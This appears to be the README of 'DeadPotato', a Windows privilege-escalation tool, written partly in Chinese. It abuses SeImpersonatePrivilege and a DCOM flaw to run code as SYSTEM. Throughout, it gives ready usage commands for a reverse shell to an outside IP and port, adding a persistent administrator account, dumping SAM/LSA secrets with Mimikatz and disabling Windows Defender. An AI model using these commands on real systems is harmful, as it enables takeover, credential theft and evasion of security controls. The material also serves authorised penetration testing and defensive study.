C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
您的上下文中启用了SeImpersonatePrivilege
权限吗?使用DeadPotato ,可以在本地系统上获得最大权限。
该工具将尝试通过滥用 DCOM 在处理 OXID 时的 RPCSS 缺陷来启动在NT AUTHORITYSYSTEM
用户上下文中运行的提升进程,从而允许对计算机进行不受限制的访问以自由执行关键操作。-cmd
模块。许多模块可供使用,例如用于生成提升的反向 shell 的-rev IP:PORT
、用于创建新的本地管理员用户以实现持久性的-newadmin usr:pass
或用于转储 SAM 哈希值的-mimi sam
。
为了使用 DeadPotato,必须在当前上下文中启用 SeImpersonatePrivilege 权限。为了验证这一点,可以执行whoami /priv
命令。如果禁用了权限,则在当前上下文中不可能利用该权限。
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
“DeadPotato”这个项目是一个基于北辰梦的杰作“GodPotato”源代码构建的工具。如果您喜欢这个项目,请务必也去支持原始项目
BeichenDream,Benjamin DELPY gentilkiwi
,BloodHound 开发者。
该项目根据 Apache 2.0 许可证获得许可。请查看许可证文件以了解更多详细信息。